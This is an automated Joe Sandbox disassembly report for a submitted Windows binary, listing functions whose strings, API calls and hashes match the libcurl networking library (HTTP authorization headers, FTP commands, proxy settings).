Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _gmtime64
String ID: %s: %s, %02d %s %4d %02d:%02d:%02d GMT$If-Modified-Since$If-Unmodified-Since$Invalid TIMEVALUE$Last-Modified
API String ID: 1355024304-4153637960
Opcode ID: 06172f87adf56489ae05b08d51bb03f2f251ee77c9de8d506fae82ab576a955e
Instruction ID: b9716ec4d242bc5b683c9417b58f2de3381df0e90981e3ce6efb2c48d8d27f4c
Opcode Fuzzy Hash: 06172f87adf56489ae05b08d51bb03f2f251ee77c9de8d506fae82ab576a955e
Instruction Fuzzy Hash: A241A532A187428AE720EB19E4407AAF3B1FB94790F900631EA6D477D5DFBDE501CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DA15D0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 84COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DA163A
__swprintf_l.LIBCMT ref: 00007FF7F1DA16CD

Strings

curl_easy_setopt(hnd, %s, , xrefs: 00007FF7F1DA1629
%*s, xrefs: 00007FF7F1DA16BC
%s%ldL);, xrefs: 00007FF7F1DA16EE
%s(long)%s%s, xrefs: 00007FF7F1DA1672

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l
String ID: %*s$%s%ldL);$%s(long)%s%s$curl_easy_setopt(hnd, %s,
API String ID: 1488884202-3167448197
Opcode ID: d883462d4f363a7398a52ea1896f0bdb0d4288d449e206b74f2286734631dcfb
Instruction ID: 1137f44db40ad8eb57b63a6854d1101d304bc875dd2bf187115b642e58a7fe68
Opcode Fuzzy Hash: d883462d4f363a7398a52ea1896f0bdb0d4288d449e206b74f2286734631dcfb
Instruction Fuzzy Hash: 4B313F22A18A4795EB50EB15E8103E5A3B4EB84755FC81132D97D873D9EFBCE608C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DC72CC Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 79COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 00007FF7F1DC733F
_scwprintf.LIBCMT ref: 00007FF7F1DC73BA

Strings

Basic, xrefs: 00007FF7F1DC72D5
Proxy-, xrefs: 00007FF7F1DC73A2
%sAuthorization: Basic %s, xrefs: 00007FF7F1DC73AC
%s:%s, xrefs: 00007FF7F1DC7334

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _scwprintf
String ID: %s:%s$%sAuthorization: Basic %s$Basic$Proxy-
API String ID: 1992661772-2466770355
Opcode ID: 444764fe44966ccb04671568f70d680a79f000c40923b4e270f62c6d23e680ac
Instruction ID: bba1639f3d90c6ebe80a730cb7c09db39c0b909f47e5536fc603ef1edb93d2b0
Opcode Fuzzy Hash: 444764fe44966ccb04671568f70d680a79f000c40923b4e270f62c6d23e680ac
Instruction Fuzzy Hash: 59316121A08A4682EB05EB15E4943A9A3B0FB85B91F944631DE3D477E4DFBCE506C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DB320C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56networkCOMMON

Download Yara Rule

APIs

getpeername.WS2_32 ref: 00007FF7F1DB3256
WSAGetLastError.WS2_32 ref: 00007FF7F1DB3260

Part of subcall function 00007FF7F1DAE9C8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAE9E3
Part of subcall function 00007FF7F1DAE9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAE9EB
Part of subcall function 00007FF7F1DAE9C8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAE9FB
Part of subcall function 00007FF7F1DAE9C8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEA05
Part of subcall function 00007FF7F1DAE9C8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAEA18
Part of subcall function 00007FF7F1DAE9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEAA8
Part of subcall function 00007FF7F1DAE9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEAB3
Part of subcall function 00007FF7F1DAE9C8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAEABC
Part of subcall function 00007FF7F1DAE9C8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAEAC8

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DB32A1
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DB32A9

Strings

ssrem inet_ntop() failed with errno %d: %s, xrefs: 00007FF7F1DB32C4
getpeername() failed with errno %d: %s, xrefs: 00007FF7F1DB327A

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _errno$ErrorLast$__sys_errlist__sys_nerrgetpeernamestrncpy
String ID: getpeername() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
API String ID: 1595226642-4047410615
Opcode ID: 3935a7dc25cb01853878d93bc9c5b6711891ab3ee3726f6dfd06770b26f74baa
Instruction ID: 4adfb0cce7de6e08166d6436adc0bc0b57096490e866d1e4caf718a654d7ca95
Opcode Fuzzy Hash: 3935a7dc25cb01853878d93bc9c5b6711891ab3ee3726f6dfd06770b26f74baa
Instruction Fuzzy Hash: ED219522B1868292FB24FB15E4407E9A370BF88B85FC04035E95E077D5DFACE505D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D93344 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

SearchPathA.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-2-0 ref: 00007FF7F1D933B6
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1D933C5
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D933D4
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1D933E9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D933F8

Strings

curl-ca-bundle.crt, xrefs: 00007FF7F1D93396

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _strdupfree$PathSearch
String ID: curl-ca-bundle.crt
API String ID: 4109318298-694051528
Opcode ID: b49543137be32970d793e18ebee1d1012d02deb88f2d5d3c8d23ded886a85623
Instruction ID: fc7f9cb00aeaa5dcb5c5540d460647adab5416fe34719e6c94a75d3ddb8752c8
Opcode Fuzzy Hash: b49543137be32970d793e18ebee1d1012d02deb88f2d5d3c8d23ded886a85623
Instruction Fuzzy Hash: BD217436708B8192E715DB61F4442AAB7B4FB48780FC44135DA9D47B99DF7CD411C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DD3138 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 51COMMON

Download Yara Rule

Strings

PRET RETR %s, xrefs: 00007FF7F1DD31D3
PRET STOR %s, xrefs: 00007FF7F1DD31CA
NLST, xrefs: 00007FF7F1DD31A8
LIST, xrefs: 00007FF7F1DD31AF
PRET %s, xrefs: 00007FF7F1DD31BA

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l
String ID: LIST$NLST$PRET %s$PRET RETR %s$PRET STOR %s
API String ID: 1488884202-294979158
Opcode ID: 5afb022be6587c34c4eaa926b2997684ed590efcb9889b4dbdfa91b3d086748a
Instruction ID: b70bb08ed5af42c8b75eb407473e2bd91d31fe2f21f814039c122ef871d4763b
Opcode Fuzzy Hash: 5afb022be6587c34c4eaa926b2997684ed590efcb9889b4dbdfa91b3d086748a
Instruction Fuzzy Hash: 3C216FA1E0C687A1FB54AB6884457F9F7B09F01B48FD84036C52D471D1CFADA549C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DB5E88 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 49COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 00007FF7F1DB5F49

Strings

%s%s%s%s%s%s%I64d%s%s, xrefs: 00007FF7F1DB5F38
unknown, xrefs: 00007FF7F1DB5EAC
TRUE, xrefs: 00007FF7F1DB5EEA
FALSE, xrefs: 00007FF7F1DB5EF6
#HttpOnly_, xrefs: 00007FF7F1DB5F13

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _scwprintf
String ID: #HttpOnly_$%s%s%s%s%s%s%I64d%s%s$FALSE$TRUE$unknown
API String ID: 1992661772-3622669638
Opcode ID: fc343e6c086d41137686d84e63e98fad484ebc05623bfdad24137c06067b3214
Instruction ID: fbc336da1246ebddf9f41c2746e94963d7055a0f2d3195bf7c7131aeb9da8cd5
Opcode Fuzzy Hash: fc343e6c086d41137686d84e63e98fad484ebc05623bfdad24137c06067b3214
Instruction Fuzzy Hash: 7B21AE62608B8591EB41DB04E9443A8B7F0F705B84FD84035DA6D077A4DFBCD9A5C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DD66A0 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 225COMMON

Download Yara Rule

Strings

path contains control characters, xrefs: 00007FF7F1DD6705
Request has same path as previous transfer, xrefs: 00007FF7F1DD69EA
Uploading to a URL without a file name, xrefs: 00007FF7F1DD6940

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID:
String ID: Request has same path as previous transfer$Uploading to a URL without a file name$path contains control characters
API String ID: 0-4131979473
Opcode ID: 8800b3d9de597adc8fb589d90272528016c92edfafc2870e6cb19615b1a0b206
Instruction ID: 96832cba3b75b01fafe51be66b9ef6009e0bdcc955cbcac6811b67c9e0f280f4
Opcode Fuzzy Hash: 8800b3d9de597adc8fb589d90272528016c92edfafc2870e6cb19615b1a0b206
Instruction Fuzzy Hash: 27917925E0878692EB58AB2594502B9B7B0FB49B84F844035CE6E073D4DFBDE45983E1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DB9118 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 83COMMON

Download Yara Rule

APIs

tolower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DB9153

Strings

http_proxy, xrefs: 00007FF7F1DB919A
Uses proxy env variable %s == '%s', xrefs: 00007FF7F1DB9223
all_proxy, xrefs: 00007FF7F1DB91F2
_proxy, xrefs: 00007FF7F1DB9167
ALL_PROXY, xrefs: 00007FF7F1DB9209

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: tolower
String ID: ALL_PROXY$Uses proxy env variable %s == '%s'$_proxy$all_proxy$http_proxy
API String ID: 3025214199-127164392
Opcode ID: 0ff445e987f6f2f59b3ac461c031a8cb0d0bb56be4954b269ca301acc5c1ab6b
Instruction ID: c8d6e0bbf3cdac1e3beddfc8d0990ec4087f0104657547efb33cc08a255798a7
Opcode Fuzzy Hash: 0ff445e987f6f2f59b3ac461c031a8cb0d0bb56be4954b269ca301acc5c1ab6b
Instruction Fuzzy Hash: 0731B321A0C78690EB18EB15A4502B9F7A4BF19B88FC44135DAAD177C6DF6CE105C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DBECD8 Relevance: 9.1, APIs: 6, Instructions: 56COMMON

Download Yara Rule

APIs

EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF7F1DB70B8,?,?,?,00007FF7F1DB7462), ref: 00007FF7F1DBED0F
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00007FF7F1DB70B8,?,?,?,00007FF7F1DB7462), ref: 00007FF7F1DBED22
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,00007FF7F1DB70B8,?,?,?,00007FF7F1DB7462), ref: 00007FF7F1DBED2F
WaitForSingleObjectEx.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00007FF7F1DB70B8,?,?,?,00007FF7F1DB7462), ref: 00007FF7F1DBED42
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,00007FF7F1DB70B8,?,?,?,00007FF7F1DB7462), ref: 00007FF7F1DBED4B
closesocket.WS2_32 ref: 00007FF7F1DBED7C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: CloseCriticalHandleSection$EnterLeaveObjectSingleWaitclosesocket
String ID:
API String ID: 817826440-0
Opcode ID: 565021a328bc0089918e49ed5a3a620139350b21e882a4a8f3d53f21cbfe40a4
Instruction ID: 61ad6a1d10e774c38a97783cb7e3b97588385b0e94dbf208b2452e0f2fe063bd
Opcode Fuzzy Hash: 565021a328bc0089918e49ed5a3a620139350b21e882a4a8f3d53f21cbfe40a4
Instruction Fuzzy Hash: 36214A36608A0286E714EF16E444329B370FB88B91F844531DF6E07B94CFBCE06593A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D9EDEC Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F1DA3014: QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?,?,?,?,00007FF7F1D910B6), ref: 00007FF7F1DA3026

_time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF7F1D9EE38

Part of subcall function 00007FF7F1DAA914: WSACreateEvent.WS2_32 ref: 00007FF7F1DAAA20

__swprintf_l.LIBCMT ref: 00007FF7F1D9EF8F

Strings

Transfer aborted due to critical error in another transfer, xrefs: 00007FF7F1D9EF88

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: CounterCreateEventPerformanceQuery__swprintf_l_time64
String ID: Transfer aborted due to critical error in another transfer
API String ID: 471582966-1939301410
Opcode ID: 8187df35cc7149b8d1dc9998055b10c9ad8102b1a899c8a673c037babb31b8a9
Instruction ID: 46851cba9a7be33a60330671edf56823c806444329146e36a1cf4792130e6b67
Opcode Fuzzy Hash: 8187df35cc7149b8d1dc9998055b10c9ad8102b1a899c8a673c037babb31b8a9
Instruction Fuzzy Hash: A9B10362B0869289FB58EB6194403BDABF5BB45B84FC40135DE6E13BD9DFB8D444C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DDBA58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 177COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 00007FF7F1DDBC2F

Strings

Proxy-, xrefs: 00007FF7F1DDBC11
%sAuthorization: Negotiate %s, xrefs: 00007FF7F1DDBC28
Negotiate, xrefs: 00007FF7F1DDBA67, 00007FF7F1DDBB85
Curl_output_negotiate, no persistent authentication: cleanup existing context, xrefs: 00007FF7F1DDBB59

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _scwprintf
String ID: %sAuthorization: Negotiate %s$Curl_output_negotiate, no persistent authentication: cleanup existing context$Negotiate$Proxy-
API String ID: 1992661772-1255959952
Opcode ID: c7dd1c4233c09f985ab34f5be077910d327cf100838846418c45d0b36795a113
Instruction ID: 409fb0c79ee8c33ebb57612415f96ed79f33196574a7dde2bcb0957d5852aafe
Opcode Fuzzy Hash: c7dd1c4233c09f985ab34f5be077910d327cf100838846418c45d0b36795a113
Instruction Fuzzy Hash: 2B61C332A496C189FB18EF24D4943B9B7A0EB02B88F840535CA7E472D0CFBDE445C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DBA4C8 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138stringCOMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 00007FF7F1DBA568
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DBA5FF

Strings

Connecting to port: %d, xrefs: 00007FF7F1DBA6AB
%s%s%s, xrefs: 00007FF7F1DBA561
Connecting to hostname: %s, xrefs: 00007FF7F1DBA657

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _scwprintfstrtol
String ID: %s%s%s$Connecting to hostname: %s$Connecting to port: %d
API String ID: 3295852271-253970900
Opcode ID: 668f76038874af4a03a387691c72402cc44d9f84beb9ac7e2e113d5bfe7bb024
Instruction ID: d0eef048692fb93d6b0af563a19c6d3f772dd6de5329a6090b4fd96bc6146020
Opcode Fuzzy Hash: 668f76038874af4a03a387691c72402cc44d9f84beb9ac7e2e113d5bfe7bb024
Instruction Fuzzy Hash: E151F561A0CA8291EB25EB19E4003AAE7A0FB857D4FC44135DEBE076D4DFBCE505C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DA2C10 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 133COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DA2CA0
__swprintf_l.LIBCMT ref: 00007FF7F1DA2D8E
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DA2DC1

Strings

internal error: invalid pattern type (%d), xrefs: 00007FF7F1DA2D48
%0*lu, xrefs: 00007FF7F1DA2C8B

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l$_strdup
String ID: %0*lu$internal error: invalid pattern type (%d)
API String ID: 3016644273-449433499
Opcode ID: 700e0c9ed3a70d8c7bc352b7ac74fef6bd43bfcd5db43767ff772a170a3355fd
Instruction ID: 55b69ee590da4cd6dbd7c03f07a698adff2a2fa168408151d3ad9b3dd64e6697
Opcode Fuzzy Hash: 700e0c9ed3a70d8c7bc352b7ac74fef6bd43bfcd5db43767ff772a170a3355fd
Instruction Fuzzy Hash: 1A51E322A0968186EB55EB19C10477CAB70FB00B54FA84635CA7C077D7CFACE44393E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DD3708 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 128COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DD37CE
__swprintf_l.LIBCMT ref: 00007FF7F1DD389C
__swprintf_l.LIBCMT ref: 00007FF7F1DD38CF

Strings

RETR %s, xrefs: 00007FF7F1DD38C5
SIZE %s, xrefs: 00007FF7F1DD3892

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l
String ID: RETR %s$SIZE %s
API String ID: 1488884202-1273946937
Opcode ID: 47222ed69264df7e803e69610e1eed05c0d9eed1612d7b994bf5c3e01cf96f64
Instruction ID: b15189993d3395695b6b325bcabdb400ff027c9f47045ffebcc1a96f59fa84b4
Opcode Fuzzy Hash: 47222ed69264df7e803e69610e1eed05c0d9eed1612d7b994bf5c3e01cf96f64
Instruction Fuzzy Hash: 8C51B3F2F08782A1EB589B2595116B8F7B0EB04B94F894135D92E477D4DFBCE850C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DA8B60 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 111stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F1D93E4C: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D93E89

strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,00000000,?,00007FF7F1DA96CD), ref: 00007FF7F1DA8C51
__swprintf_l.LIBCMT ref: 00007FF7F1DA8C84

Strings

%ld, xrefs: 00007FF7F1DA8C6C
[%*45[0123456789abcdefABCDEF:.]%c%n, xrefs: 00007FF7F1DA8B8D
%*[^]]%c%n, xrefs: 00007FF7F1DA8BC5

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

